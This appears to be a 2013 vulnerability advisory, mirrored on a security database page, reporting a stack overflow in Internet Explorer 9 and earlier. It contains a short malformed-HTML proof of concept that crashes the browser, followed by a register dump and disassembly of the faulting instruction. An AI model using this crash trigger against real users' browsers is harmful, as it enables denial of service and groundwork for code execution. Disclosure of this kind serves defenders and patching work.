Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28906
HistoryJan 02, 2013 - 12:00 a.m.

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

2013-01-0200:00:00
vulners.com
15

Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability

Author: Jean Pascal Pereira <[email protected]>

Vendor: Microsoft Internet Explorer 9.x and below

Description:

The application is prone to a remote stack overflow vulnerability.

Successful exploitation may lead to arbitrary code execution.


Proof Of Concept:

<table></for xmlns="1">
<td><datetime><colgroup>
<id><dd><col>
</table><object>
<hr><base>


Register Dump:

EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51


Crash Instruction:

7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
7629CF39 24 04 AND AL,4
7629CF3B 0FB6C0 MOVZX EAX,AL
7629CF3E F7D8 NEG EAX
7629CF40 1BC0 SBB EAX,EAX
7629CF42 25 0A010180 AND EAX,8001010A
7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX
7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]
7629CF4C 50 PUSH EAX
7629CF4D 53 PUSH EBX
7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI
7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C]


At 0x7629CF51, a read access violation occurs.

Jean Pascal Pereira <[email protected]> || http://www.0xffe4.org

Copy: http://paste.kde.org/627968/